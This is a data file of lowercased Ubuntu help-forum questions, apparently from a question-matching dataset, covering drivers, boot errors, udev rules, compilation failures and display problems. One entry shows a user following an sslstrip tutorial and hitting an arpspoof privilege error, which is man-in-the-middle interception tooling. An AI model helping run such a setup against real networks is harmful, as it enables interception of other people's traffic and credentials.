418873	where does apticron get the ip adresses from ?	i receive emails from apticron about available updates for my ubuntu server . that 's great so far , but in the email , there are 4 ip addresses listed where i expect only 2 . the two ip addresses i expect : my new ipv4 address and my ipv6 address . the ip address i do n't expect : my old ipv4 address and my new ipv4 address again ( duplicate ) . i ca n't exactly tell in how many places i changed from the old ip address to the new ip address , but it seems i forgot at least one place which is relevant for apticron . any ideas in which files i should start looking for ? in /etc/apticron/apticron.conf , it says that it will use the ip command to figure out the addresses . but when i run ip addr , it shows only my new addresses , not my old one .
418874	gnome3 win+m in unity ( ubuntu 12.04 lts )	is there a shortcut in unity ( ubuntu 12.04 ) for showing the open windows for the current desktop similar to what in gnome 3 is achievable by `` win+m '' shortcut ( the image below is an example of this ) ? edit : long `` super '' button pressure revealed a graphical list of the avaialable shortcuts , and i realized that what in gnome3 is `` super+m '' , in my version of unity is `` super+w '' . the only thing i 'm missing in unity from gnome3 is to be able to place the windows in a different workspace from that screen ( as you can see , in the rightmost part you have got the workspaces in gnome3 ) , but i 'm doing this from `` super+s '' screen . it is a bit more uncomfortable because it allows you to move only the top windows , but i think i can survive : )
418877	artillary is not with ssh in ubuntu	i have installed artillery in ubuntu 12.04 lts . i have started artillary and started that service with service artillery start while i am doing netstat -nltp | grep listen why ssh port number not getting protection from the artillery ? root @ ubuntu : ~ # service artillery start starting artillery ... ok root @ ubuntu : ~ # netstat -nltp | grep listen tcp 0 0 0.0.0.0:110 0.0.0.0 : * listen 1335/dovecot tcp 0 0 0.0.0.0:143 0.0.0.0 : * listen 1335/dovecot tcp 0 0 0.0.0.0:10000 0.0.0.0 : * listen 2657/perl tcp 0 0 0.0.0.0:80 0.0.0.0 : * listen 1970/apache2 tcp 0 0 xxx.xxx.xxx.xxx:53 0.0.0.0 : * listen 1377/named tcp 0 0 127.0.0.1:53 0.0.0.0 : * listen 1377/named tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen 636/sshd tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen 998/cupsd tcp 0 0 127.0.0.1:953 0.0.0.0 : * listen 1377/named tcp 0 0 0.0.0.0:993 0.0.0.0 : * listen 1335/dovecot tcp 0 0 0.0.0.0:995 0.0.0.0 : * listen 1335/dovecot tcp 0 0 127.0.0.1:3306 0.0.0.0 : * listen 1749/mysqld tcp6 0 0 : ::110 : : : * listen 1335/dovecot tcp6 0 0 : ::143 : : : * listen 1335/dovecot tcp6 0 0 : ::53 : : : * listen 1377/named tcp6 0 0 : ::22 : : : * listen 636/sshd tcp6 0 0 : :1:631 : : : * listen 998/cupsd tcp6 0 0 : :1:953 : : : * listen 1377/named tcp6 0 0 : ::993 : : : * listen 1335/dovecot tcp6 0 0 : ::995 : : : * listen 1335/dovecot root @ ubuntu : ~ # may i know why and how i can give protection to the ssh port artillery ?
418880	how to detect amd graphic processor ?	my laptop lenovo g500 has a radeon hd 8570m video card and intel hd4000 ! processor intel 2020m . kubuntu 13.10 i 'm keen on to find wether my laptop has another graphic processor or not ? and so , how to enable amd for usage ? how should i find this ? ( for start x i must use `` nomodeset '' ) i installed already sudo apt-get install fglrx fglrx-pxpress when it was installed and reboot pc i have only black screen ( f12 do n't help ) or just show a console login : / lspci | grep vga 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) sudo lshw -c video *-display unclaimed description : display controller product : sun pro [ radeon hd 8570m ] vendor : advanced micro devices , inc. [ amd/ati ] physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi bus_master cap_list configuration : latency=0 resources : memory : d0000000-d7ffffff memory : d8600000-d863ffff ioport:3000 ( size=256 ) memory : d8640000-d865ffff *-display unclaimed description : vga compatible controller product : 3rd gen core processor graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller cap_list configuration : latency=0 resources : memory : d8000000-d83fffff memory : c0000000-cfffffff ioport:4000 ( size=64 ) i have only this : xorg.conf.fglrx-0 but this is old xorg conf when i have already installed fglrx driver and i have : xorg.conf.original-0 : # noxorgconfexisted : no x.org configuration file existed when this backup was created .
418881	why i am getting like no artillery service ?	i have installed artillery in my ubuntu 12.04 lts successfully but while i am starting it as a service its not getting started . please find the below terminal log . root @ ubuntu : ~ # service artillery stop stopping artillery ... /etc/init.d/artillery : line 58 : kill : ( 54215 ) - no such process ok root @ ubuntu : ~ # service artillery start starting artillery ... ok root @ ubuntu : ~ #
418882	alt+f2 then `` poweroff '' not working in unity ( ubuntu 12.04 )	i come from fedora 16-20 and definitely freshman in using ubuntu , i was used in gnome3 to turn off my computer by typing alt+f2 , then typing `` poweroff '' and return . in unity `` alt+f2 '' actually open the `` quick terminal '' but `` poweroff '' command is not working , as well as any other poweruser command ( launching applications seems fine ) , even if provided with sudo command ( it is not asking any password ) . from the shell it is working fine ( `` sudo poweroff '' and inserting the password ) . i 've read that it is possible to define a shortcut for this , but i 'm not interested in ( in that case i can simply use the gui ) , i only want to know if it is possible to use poweroff from the `` quick terminal '' ( alt+f2 ) , or if it is not available for some reason ( and possibly i would undestand why ) .
418883	console output headers not aligned with columns	how can i make all command-line tools like arp or netstat show their output properly , so that the header line is aligned with the rest of the output ? the answer should not be manipulating the output itself ( e.g . with column -t or similar ) .
418886	link `` make '' command to lib and include	i want to use `` make '' command and link it to the include and lib path . i am using : make -i /path_to_include - l /path_to_lib but it gives me : '' nothing to be done for /path_to_lib ( the path is correct )
418887	are there any wired ( gaming ) controllers that `` just work '' or natively support linux/ubuntu ?	pretty much as the title suggests , are there any wired ( gaming ) controllers that `` just work '' or natively support ubuntu `` out-of-the-box '' ? having spent plenty of time fighting ( ongoing ) battles with ubuntu , it 'd be nice to have something that is natively supported or `` just works '' for a change ... it has to be wired - i have the logitech f710 , but it chews through batteries like they 're going out of fashion and like many users , i am constantly having connectivity issues with it ( under microsoft windows and ubuntu ) !
418888	how to unlock boot-loader of android phone ?	i want to unlock boot-loader of android phone . actually i want to dual boot the android phone with android and ubuntu . for that i have to unlock boot-loader first . whenever i run fast boot oem unlock then it display : waiting for devices ... .. nothing more then . any suggestion or link for unlock android boot-loader . i have mediatek chip set enable android phone ( i.e chinese android phone ) .
418893	usb hdd to internal hdd	ok i am a noob to linux and ubuntu . i have after trying many times created a live boot disk using my samsung galaxy ring , droiddrive , and ubuntu 12.04 iso . i am now running ubuntu 12.04 lts on an acer aspire one d255-2566 . i ran the boot disk and installed ubuntu to a formatted ps3 60 gb sata hard drive . i initially tried installing ubuntu using the drive as an internal hdd in my acer . the boot disk worked fine . i was able to check ubuntu out and liked it so i tried to install it . when i rebooted , i put the internall 1rst on the boot list in bios and restarted my acer . ubuntu loaded but got stuck on the splash screen . i then pulled the ps3 hdd out of my acer , and put it into a sata to usb hdd enclosure . i started the boot disk again , reformatted the hard drive ( now a usb hdd ) and installed ubuntu . i then restarted my acer , loaded bios and set the usb hdd to boot first . i restarted my acer and everything works perfect . that was the specifics ... now for the question ... if i power off my acer , remove the hdd from the external enclosure and use it as the internal hdd in my acer , boot into bios and set my internal hdd to boot first , will everything work ? i know in the time it took me to type this on my android i could have tried it , but i want to be sure . thanks and preciation to any one who can help a noob .
418894	./setup.sh permission denied	what is the problem in that ? i work in xubuntu x86_x64 i get the following error while trying to execute install_bin : mohamed @ mohamed : ~/desktop/installer_v3.0 $ ls batch_installer install_bin installer install.now setup.sh mohamed @ mohamed : ~/desktop/installer_v3.0 $ ls -l total 44 -rw-rw-rw- 1 mohamed mohamed 8533 jan 24 2013 batch_installer drwxrwxrwx 13 mohamed mohamed 4096 feb 9 19:29 install_bin -rw-rw-rw- 1 mohamed mohamed 9179 jan 24 2013 installer -rwxrwxrwx 1 mohamed mohamed 9179 jan 24 2013 install.now -rwxrwxrwx 1 mohamed mohamed 497 jan 24 2013 setup.sh mohamed @ mohamed : ~/desktop/installer_v3.0 $ ./setup.sh /home/mohamed/desktop/installer_v3.0/installer : permission denied . mohamed @ mohamed : ~/desktop/installer_v3.0 $
418895	how to solve the error of `` gave up waiting for root device '' at boot ?	i am using lubuntu 13.10 which has been working fine for about a month but suddenly my desktop froze and since then i get the following error at boot which does n't allow me to use it : gave up waiting for root device . screenshot of the complete window : i am getting the following error also , error : unknown filesystem entering rescue mode grub rescue >
418901	ubuntu 13.10 on asus s550 laptop makes the fan to be on continuously	i recently installed ubuntu 13.10 on my asus laptop with windows 8.1 on it . after installation i am finding that the fan , for some reason is continuously on . i checked the ram and processes list to see if it is running a lot of them but everything seems to be normal there . hardly 1.2 gb ( out of 4 gb ) of ram is being used . i also checked the sensor and all their temperatures seem normal . but i am not able to figure out what is causing the fan to be on always . regards , vig
418903	western digital my cloud nas device installation	i am tempted to get a western digital my cloud device and i was wondering if anyone has got it working in ubuntu 13.10 .
418906	i am looking for drivers for my epson stylus cx4300 for ubuntu 12.04 lts	i have n't been able to find software drivers for my epson stylus cx4300 . this is a multi-function device consisting of a printer and scanner . the articles on the forums refer to older versions of ubuntu and furthermore , avasis no longer provide drivers as suggested in the articles . this morning i even phoned epson in johannesburg and they told me that my device is not compatible with ubuntu . how difficult is it to `` translate '' , for example , windows 7 drivers into what is required for ubuntu ?
418908	block torrents over l2tp/ipsec vpn for certain users	i have setup my vps to act as a vpn server . i would like to block torrent downloads over the vpn connection to conserve bandwidth , ideally for certain users , however my users do n't have a fixed ip address which seems to make things harder from what i can tell . i ca n't find any documentation or tools at the moment , can anyone point me in the right direction ?
418909	how to trigger a script when an external usb disk is mounted ?	i need to automatically copy images off a camera when it is inserted into the usb port . i 've written a script to do the copying , and i 've found that , by creating a file /etc/udev/rules.d/95-my-own.rules with the line action== '' add '' , kernel== '' sdg1 '' , run+= '' /path/to/my/script '' i can invoke the script when a usb device ( such as the camera ) is inserted . the script is invoked at a time when the disk has n't been mounted yet . my workaround is to make the script start the copying process in the background after some sleep to give it time for the file system to be mounted , but it would be better to trigger the script right after the file system has been mounted . how ?
418910	customized page can not print in ubuntu 12.04	i have setup `` hp officejet pro 3610 '' network printer with my system using cups . i ca n't print from firefox with custom size , when i click print button my printer shows `` status : processing '' for long time . but i can able to print using default paper size such as us legal , a3 , a4 , a5 , etc.. i 'm stuck with this issue now , what can i do to solve this ? what can be the reason ?
418913	mesa installation - make process - issue	i am trying to build and install mesa library in ubuntu 13.10.. in the make command , i am facing the following erros.. sathish @ ubuntu : ~/desktop/layer_management-1_2/work/mesa/src/loader $ make -j 4 cd ../.. & & /bin/bash ./config.status src/loader/makefile depfiles config.status : creating src/loader/makefile config.status : executing depfiles commands cc libloader_la-loader.lo ../../libtool : line 444 : $ '\r ' : command not found ../../libtool : line 447 : $ '\r ' : command not found ../../libtool : line 452 : $ '\r ' : command not found ../../libtool : line 473 : $ '\r ' : command not found ../../libtool : line 523 : $ '\r ' : command not found ../../libtool : line 529 : $ '\r ' : command not found ../../libtool : line 539 : syntax error near unexpected token `newline' './../libtool : line 539 : ` case ` ( set -o ) 2 > /dev/null` in *posix* ) set -o posix ; ; esac make : *** [ libloader_la-loader.lo ] error 2 can anybody point the cause of this error .
418918	content alignment in libre office is differ than ms office	i have created a word document using ms office ( .doc ) , it contains words and lines . when i opened that document with libre office in ubuntu 12.04 some words and lines alignment was totally differ from ms word . is there any solution to solve this problem ?
418922	systray on ubuntu unity 12.04 64bits disappeared	from time to time , it flashes showing some icons ( sound , the time , etc ) just to disappear once again . i have tried unity -- reset with a result of many `` failed '' , `` error '' or `` warn '' messages . whatever caused this , also prevents me from opening some apps like image viewer , transmission , etc .
418923	unity : keyboard does n't work	i was just thinking to myself that i was finally getting on ok with unity when all of a sudden my keyboard stopped working . it 's not a hardware issue : i 've made no hardware changes , and the keyboard does work to enter login password , and it works perfectly in kde , which i 've now switched to using . in unity , no keystrokes get through . i ca n't even use system escape sequences , ca n't switch to a virtual terminal , nothing . i am using an acer laptop . i plugged in an external , known good usb keyboard - still no keystrokes are accepted . i tried using the onboard soft keyboard - that does n't work either . the only input device that still works is the mouse . the only way i 've found to get character input into the system is via libreoffice 's insert special characters dialog ! ( the ubuntu/unity character map application does work but it does n't offer the option to enter numeric digits ! ) . i 've tried all the different input method options i can find via system settings/language preferences etc. , logging out & in , rebooting ... nothing makes any difference . what has changed in the system ? all i can say is that i generally go right ahead and apply any and all updates that the software updater suggests , so the system ought to be right up to date . mark @ mes3810 : ~ $ uname -a linux mes3810 3.11.0-15-generic # 25-ubuntu smp thu jan 30 17:25:07 utc 2014 i686 i686 i686 gnu/linux any ideas where i can start looking to diagnose this ( bearing in mind that keyboard input in unity is n't working ) ?
418925	single terminal instance does n't come up when i click on the icon in the launcher	i have a couple of terminals open in ubuntu ( 13.04 ) . if i click on the terminal icon in the bar on the left side of the screen i can see all of them on my screen . however , with 1 open terminal i ca n't access it if i click on it in this setting ( it just does n't appear after clicking on it although it is present in the view of all terminals ) . is there any way to access this specific terminal through the commans line or to get a list of the terminals and then use the id ( or something like this ) to then somehow access it ?
418927	access denied while trying to join domain	hi i have configured bind9 with samba and ldap , i am not able to join windows computers to the domain it says the following error occured while trying to join domain xyz . access denied
418932	ubuntu - how to fix this problem with hp elite 800 all in one ? often i get black screen with mouse cursor only	how to get the desktop always ? instead of after reboot it shows mouse cursor only and black screen nothing else works unless i go to ctrl+alt+f1 and use it as command line . version : linux hpelitee800 3.11.0-15-generic # 25-ubuntu smp thu jan 30 17:22:01 utc 2014 x86_64 x86_64 x86_64 gnu/linux dmesg : [ 2891.038975 ] [ drm : i915_set_reset_status ] *error* render ring hung inside bo ( 0x503c000 ctx 1 ) at 0x503c220 [ 2945.012604 ] [ drm : i915_hangcheck_elapsed ] *error* stuck on render ring [ 2945.012720 ] [ drm : i915_set_reset_status ] *error* render ring hung inside bo ( 0x5094000 ctx 1 ) at 0x5094220 [ 2951.035024 ] [ drm : i915_hangcheck_elapsed ] *error* stuck on render ring [ 2951.035109 ] [ drm : i915_set_reset_status ] *error* render ring hung inside bo ( 0x503c000 ctx 1 ) at 0x503c220 [ 2969.970001 ] [ drm : i915_hangcheck_elapsed ] *error* stuck on render ring [ 2969.970113 ] [ drm : i915_set_reset_status ] *error* render ring hung inside bo ( 0x1074000 ctx 0 ) at 0x1074230 [ 2975.968416 ] [ drm : i915_hangcheck_elapsed ] *error* stuck on render ring [ 2975.968509 ] [ drm : i915_set_reset_status ] *error* render ring hung inside bo ( 0x5063000 ctx 1 ) at 0x5063220 [ 2981.966825 ] [ drm : i915_hangcheck_elapsed ] *error* stuck on render ring [ 2981.966933 ] [ drm : i915_set_reset_status ] *error* render ring hung inside bo ( 0x5094000 ctx 1 ) at 0x5094220 [ 2988.013224 ] [ drm : i915_hangcheck_elapsed ] *error* stuck on render ring [ 2988.013310 ] [ drm : i915_set_reset_status ] *error* render ring hung inside bo ( 0x507b000 ctx 1 ) at 0x507b220 [ 2994.011639 ] [ drm : i915_hangcheck_elapsed ] *error* stuck on render ring [ 2994.011733 ] [ drm : i915_set_reset_status ] *error* render ring hung inside bo ( 0x5094000 ctx 1 ) at 0x5094220 [ 2999.998048 ] [ drm : i915_hangcheck_elapsed ] *error* stuck on render ring [ 2999.998123 ] [ drm : i915_set_reset_status ] *error* render ring hung inside bo ( 0x507b000 ctx 1 ) at 0x507b220 [ 3000.018028 ] [ drm : __gen6_gt_force_wake_mt_get ] *error* timed out waiting for forcewake old ack to clear .
418935	how to read apple hard drive on linux without root privileges ?	i just want to read my apple hard drive on my linux computer without root privileges . my goal is only to read and copy some file from my home directory ( in documents ) . currently i can read the contents of ~/ but i ca n't read ~/documents . the permissions of the documents directory are drwx -- -- -- .
418936	mysqldbcopy : command not found	i am trying to run a script that requires usage of the mysqldbcopy tool . from reading the ubuntu manual , it appears that one just needs to install the mysql-utilities-1.3.5-1_all . when entering that into apt-get install , it could not be found , so i tried using the mysql-utilitie* regexp which resulted in the following output : note , selecting 'mysql-utilities ' for regex 'mysql-utilitie*' 0 to upgrade , 0 to newly install , 0 to remove and 0 not to upgrade . this leads me to believe that i already have it installed . the output of mysql -- version for reference is : mysql ver 14.14 distrib 5.5.35 , for debian-linux-gnu ( x86_64 ) using readline 6.2 what do i need to do in order to get mysqldbcopy installed on my ubuntu 12.04 desktop ?
418937	is ubuntu compatible with the macbook air 1,1 ?	i have failed countless times to install this os and i have no other means of installing it . i have tried to boot from a usb and it displayed an error saying `` isolinux.bin missing or corrupt '' and i have ran sudo dd on my usb about 6-8 times now with a few different versions of ubuntu but still no progress . i do n't want to have to result to using virtual box as i want the actual operating system to boot from . i am using refind and refit as it boots as the one and i have the option to boot to the other . i have tried to use a wireless dvd drive but i found out it does n't work and i do n't have the time or money to buy a usb optical drive . can someone please tell me if my macbook air is actually compatible with ubuntu . i am running mac osx 10.6.8 .
418938	grub rescue error when booting	i was using ubuntu 13.04 alongside windows 8 , but i deleted the ubuntu from the c drive where it was installed and deleted and formatted the partition as well . i extended the c drive with its previous partition . now , when i restart my pc the screen shows grub rescue error : no partition . how can i completely delete ubuntu and restore it to windows 8 again ?
418943	installing *buntu on an asus memo pad fhd 10	i 'm looking at buying an asus memo pad fhd 10 . it has an intel atom processor . i 'm curious about what would be involved in getting ubuntu installed on it . touch or full desktop does n't matter . http : //www.amazon.com/asus-me302c-a1-wh-10-1-inch-tablet-white/dp/b00dxfdi4o/ref=sr_1_3 ? ie=utf8 & qid=1392033988 & sr=8-3 & keywords=memo+pad+fhd+10
418944	installing nvidia drivers on acer aspire v5-573g	i am new to linux in general ( ive just tried it years ago ) and as i 've seen it for first time - i loved it ! the best os for me but there was a little problem - i am a gamer since i remember myself . but now i am sick n tired of windows and want to start using only linux ( till now i used it dual boot ) as i read a lot that gaming for linux is advancing every single day . so .. straight to the point : i am installing ubuntu ( setting partitions , everything just the way it is supposed to ) and everything is running fine till i star preparing my laptop for gaming . 1st thing ofc is to install the video card driver - but as long as it is hybrid - after i install the right version of the driver and after the restart - my monitor goes black and thats it . ( not to mantion that at the begging of the install i 've to increase manually the brightness to maximum in order to see the desktop , otherwise its all black ) . as it took me hours of reading and searching for ppl with my problem , this time i want to straight ask here.. 1st of all is linux ( in this case ubuntu ) ready for gaming ot all , or i should quite trying . 2nd how i am supposed to prepare the laptop for gaming ( i mostly play diablo iii , wow , dota 1,2 ) . what are the steps and the things i need to do . i will appreciate every help , because i really dont want to use other os rather than linux now but still want to be able to play . thanks a lot in advance to these who will help me . regards
418945	arpspoof : libnet_init ( ) : uid or euid of 0 required	i 'm a new ubuntu user and i 'm trying sslstrip .i did all the steps but when i try to run arpspoof i get this error message `` arpspoof : libnet_init ( ) : uid or euid of 0 required '' here is the tuto that i folowed http : //www.thoughtcrime.org/software/sslstrip/ help ! ! ! ! thanks ( sorry for my english ) .
418947	after converting kvm machine to native environment , system boot is slow	a coworker set up a ubuntu 12.04 system that will eventually be used for booting without a disk via the network with kvm . everything works as it should on native hardware , except a delay of 113-114 seconds while booting . in this time nothing shows up in the logfiles or on screen . the same problem occurs when i create a new vm in virtualbox and just tell it to boot from network . as soon as i set the virtual networkadapter to be a virtio-net adapter the boot is fast again . it seems to me that ubuntu waits for a virtio adapter ( not specified in udev/rules.d/**-persistent-net.rules ) and after a specified time it continues without a problem . how can i find this delay and fix it in a clean way ( without removing this timeout that probably has a use for something else ) ?
418951	when will the ubuntu 14.04 wallpaper contest start ? or has it already started ?	i saw once some talk about the wallpaper contest on `` omgubuntu '' but i could n't manage to find out when it would start . other than omgubuntu , where can i keep track of the contest ? oh and how do i participate ? ... where can i find such information ?
418953	can i use `` ubuntu-13.10-desktop-amd64.iso on a windows 8 laptop with an intel processor ?	i have windows 8.1 with an intel duo processor . i think amd is a type of processor and it sounds like it might not work to me .
418954	maybe abuse of my server	i have a vps at hetzner.de with vmware running several instances , one of them is an ubuntu server 13.10 , primarily acting as mysql-server for several websites . today i received an email from hetzner , saying that they have received a spam/abuse notification : my ip xx.xx.xx.xx is being ddosed from your network all ips that attack me belong to hetzner attack speed is more than 1gbit\s proto=udp spt=10000 dpt=80 dst=xx.xx.xx.xx ip addresses that are attacking me : feb 9 19:27:07 srv1 kernel : [ 112.236968 ] firewall : *udp_in blocked* in=eth0 out= mac=yy : yy : yy : yy : yy : yy : yy : yy : yy : yy : yy : yy : yy : yy src=zz.zz.zz.zz dst=xx.xx.xx.xx len=1396 tos=0x00 prec=0x00 ttl=246 id=22304 proto=udp spt=10000 dpt=80 len=1376 i 'm using ufw , and this is the result of `` ufw status '' : 34/tcp allow anywhere 22/tcp allow anywhere 3306/tcp allow aa.aa.aa.aa 3306/tcp allow bb.bb.bb.bb 3306/tcp allow cc.cc.cc.cc 3306/tcp allow dd.dd.dd.dd 34/tcp allow anywhere ( v6 ) 22/tcp allow anywhere ( v6 ) ports 22 and 34 are used for ssh only accessible with private key . port 3306 is used for the mysql-connections from webservers and developer machines i ca n't see anything unusual in my auth.log can anyone help me figuring this one out ? thanks
418955	how to write a udev rules file for /dev/sda	how to write a udev rules file to change permission of /dev/sda for permanent change of ownership to normal user ( even after reboot ) .
418963	compiz gone after 12.04 updates	i am using 12.04 lts here at work and since the last update cycle , compiz is completely not running anymore . i use the `` hot corner '' a lot , as well as configured 4x2 virtual desktops ( only have 2x2 now ) . i have n't done any changes , only run the updates . how can i get compiz running again as my default wm ?
418964	keys are not working propely	hi people i am new to ubuntu and currently have ubuntu 12.04lts installed it has been quite nice but the thing is when i tried to type `` it will show @ instead and when i tried to type @ it shows `` this instead and when i type this # this shows up âł ! please help !
418969	bugs in compiling qemu	i want to install qemu1.0.1 on linux octeon 2.6.32.13 . for some reason i can not use latest version of qemu . it configure successfully for mips64 . but in compilation it gives following error qemu-ga.o : in function `asprintf ' : /usr/include/bits/stdio2.h:158 : undefined reference to `__asprintf_chk' qemu-ga.o : in function `conn_channel_send_buf ' : /home/hafiz.shafiq/work_qemu/qemu-1.0.1/qemu-ga.c:220 : undefined reference to `g_debug' qemu-ga.o : in function `process_event ' : /home/hafiz.shafiq/work_qemu/qemu-1.0.1/qemu-ga.c:303 : undefined reference to `g_debug' qemu-ga.o : in function `process_command ' : /home/kics/hafiz.shafiq/work_qemu/qemu-1.0.1/qemu-ga.c:279 : undefined reference to `g_debug' qemu-timer-common.o : in function `init_get_clock ' : /home/hafiz.shafiq/work_qemu/qemu-1.0.1/qemu-timer-common.c:57 : undefined reference to `clock_gettime' qga/guest-agent-commands.o : in function `qmp_guest_file_write ' : /home/hafiz.shafiq/work_qemu/qemu-1.0.1/qga/guest-agent-commands.c:249 : undefined reference to `g_base64_decode' qga/guest-agent-commands.o : in function `qmp_guest_file_read ' : /home/hafiz.shafiq/work_qemu/qemu-1.0.1/qga/guest-agent-commands.c:224 : undefined reference to `g_base64_encode' collect2 : ld returned 1 exit status make : *** [ qemu-ga ] error 1
418971	install ubuntu via formatted hdd	i would like to install ubuntu on my computer ( v12.04 ) replacing a previous windows os . taking into account the following my hdd has been formatted using the windows disk managament utility ( right-click , format ) when i turn on the pc i have the bootmgr is missing message can not boot from cd/dvd as the drive is n't working correctly can not boot from usb as the option is not available . how can i install ubuntu via the hdd knowing that the only way i can access it is to remove it and put it in an external usb hdd case ?
418972	moving from itunes to rhythmbox	i am about to start moving my itunes collection from my macbook pro to my ubuntu pc and rhythmbox . i have a few questions before i begin , can i migrate over my playlists and song play counts ? i would like to re-rip my cds into alac or aiff formats to maintain metadata in the songs . can rhythmbox do this without upsetting playcounts etc . itunes allows me to do this ? on the mac/itunes the songs ripped in alac or aiff are recompressed automatically into 256 aac files for my ipod classic when it syncs . this keeps the higher def sounds on the computer and a more portable format on the ipod . i would like to continue doing this with rhythmbox . is it possible ?
418978	wifi usb adapter keeps disconnecting	with ubuntu 13.10 64bit i 'm using a d-link dwl-g132 usb wifi terminal , which works perfectly on windows . on ubuntu it keeps connecting and disconnecting all the time ( kind of switching the aeroplane mode on and off in cycles ) ; it takes a lot of cycling to connect to the wifi network , and when it does it does n't last for more than 2 minutes ! thank you in advance
418983	two boot options from usb	i currently do n't have 2 dvds to burn , so i was wondering if it was possible to somehow enable dual boot option for an usb stick in windows 8.1 my intention is to be able to first boot darik 's boot and nuke and then ubuntu setup . thanks for any support , -mihael
418987	hearthstone , ubuntu 12.04 dbghelp disabled	i 'm trying to get hearthstone working . i have an 64bit ubuntu 12.04 . the latest wine and playonlinux . i have as often said disable the dbghelp library in wine . now the battle.net launcher opens , but it does n't show me the play button or any content . only the left bar works where i can select which game i want to see , but when i select a game like wow , diable 3 , hearthstone no content is shown . is this the right place to post ? or should i post on playonlinux or on wine ? i do n't know . if someone could help me i would appreciate it . tell me if you need additional information . sickbeard
418989	can someone recommend a program able to show and execute xquery and xpath on a xml document ?	i 'm searching for a program able to do xpath and xquery on xml , but i ca n't find one ( i was using oxygen xml editor on windows 7 before ) . i was wondering if such a program exists for ubuntu .
418991	arm chroot installing xfce fails , packages named different	i am trying to install xfce within an arm chroot , most packages download fine however a handful error out , after looking at the packages in the repo i have found that what apt-get is trying to get seems to be different to what the package is named . for example , apt-get fails trying to get http : //ports.ubuntu.com/pool/main/u/upower/upower_0.9.22-1_armhf.deb when i look on the server this file is not there but there is : http : //ports.ubuntu.com/pool/main/u/upower/upower_0.9.22-1ubuntu1_armhf.deb how can i fix it so apt trys to get the right package , there are about 15 packages that seems to be looking for the wrong file
418996	serial number field disabled - office 2010 - wine	ok so i managed to run msoffice installer on my ubuntu.. but i just have one small problem.. i ca n't choose the serial number field.. i click on it but nothing happens , tried multiple installers .. same problem.. : s i am running ubuntu 12.04 lts and wine 1.7.0
419000	whats going to happen to former files when installing ubuntu desktop ?	i 'm about to test out and probably upgrade my windows vista to the latest ubuntu , and i was wondering what do i need to do in order to keep all my files so they are ready for ubuntu . i 'm obviously going to back up everything just in case , but outside of whats on my computer 's native hdd , do i need to back up what is already on an external hdd ? thank you .
419001	disable recovery mode ubuntu	i 'm working with ubuntu 12.04 lts , and in my application i turn on and turn off the system from a energy switch . my problem is the screen presentation of recovery mode . i want disable it , because i do n't have a keyboard to do the selection . it 's possible ? i try how to disable recovery mode/single user mode ? but i do n't have sucess . i try change grub_disable_recovery= '' true '' to grub_disable_linux_recovery= '' true '' in /etc/default/grub , without sucess too . please help , great hug for all .
419004	no change after installing icon theme	i was trying moka- icon theme.installed it from ubuntu software center.restarted the system but no change in icon so far.where am i wrong ! any help is appreciated .
419006	i had ubuntu 12.04 and i ca n't open ubuntu software centern or update anything , what i can do : any body can help me ?	is showing thyis erros when i try update from terminal w : duplicate sources.list entry cdrom : //ubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) / precise/restricted i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20i386 % 20 ( 20120423 ) _dists_precise_restricted_binary-i386_packages ) e : problem parsing dependency breaks e : error occurred while processing isc-dhcp-client ( newversion2 ) e : problem with mergelist /var/lib/apt/lists/ca.archive.ubuntu.com_ubuntu_dists_precise_main_binary-i386_packages e : the package lists or status file could not be parsed or opened .
419008	installed wrong graphic driver by mistake	today , i installed the wrong driver for my graphic card on my ubuntu 13.10 gnome laptop and the monitor flickers after reboot . when i use my liveusb , it works fine and i am able to access my file and folders that does not require root to access . my questions are as follows : how can i restore the driver on my laptop via liveusb ? is there such thing as undoing last dpkg updates ? where can i find log files related to recent dpkg activities ? thank you !
419010	how do i get 4k output resolution with gtx760 on ubuntu desktop 13.10 ?	i have a nvidia gtx760 with drivers installed . how do i get the option to go up to the 4k output resolution ? i am only getting 1920x1080 and below options and i have a 39 '' seiki 4k display . currently , following this thread to find answers : http : //ubuntuforums.org/showthread.php ? t=2164924
419013	downgrade php5-sybase using apt-get	i 'm trying to downgrade php5-sybase on a turnkey linux vm to avoid this bug in version 5.4.4-14+deb7u7 . i 've tried : apt-get install php5-sybase=5.4.4-14+deb7u2 but get version 5.4.4-14+deb7u2 for php5-sybase was not found any idea where i 'm going wrong ?
419014	no picture on hdmi tv	i 'm trying to connect my system to an hdmi tv . the monitor is detected on the system but the picture does n't display . it shows my bios screen and the grub menu ; it turns off when the ubuntu splash page loads . it works on windows . any help would be greatly appreciated . thanks . i am running 12.04 , gallium 0.4 on amd rv770 for my driver . my card is an ati radeon 4850 . the edid for the display is # edid version 1 revision 3 section `` monitor '' # block type : 2:0 3 : fc identifier `` x325bv-fmdr '' vendorname `` spt '' modelname `` x325bv-fmdr '' # block type : 2:0 3 : fc # block type : 2:0 3 : fd horizsync 15-68 vertrefresh 59-61 # max dot clock ( video bandwidth ) 150 mhz # dpms capabilities : active off : no suspend : no standby : no mode `` 1920x1080 '' # vfreq 60.000hz , hfreq 67.500khz dotclock 148.500000 htimings 1920 2008 2052 2200 vtimings 1080 1084 1089 1125 flags `` +hsync '' `` +vsync '' endmode mode `` 1360x768 '' # vfreq 60.015hz , hfreq 47.712khz dotclock 85.500000 htimings 1360 1424 1536 1792 vtimings 768 771 777 795 flags `` +hsync '' `` +vsync '' endmode # block type : 2:0 3 : fc # block type : 2:0 3 : fd endsection the xrandr is hdmi-0 connected 1920x1080+1920+13 ( normal left inverted right x axis y axis ) 880mm x 490mm 1920x1080 60.0*+ 50.0 24.0 25.0 30.0 1680x1050 59.9 1440x900 59.9 1360x768 60.0 1280x720 50.0 60.0 1440x576 25.0 1024x768 60.0 1440x480 30.0 800x600 60.3 720x576 50.0 720x480 59.9 640x480 60.0 59.9 720x400 70.1 running ubuntu 12.04
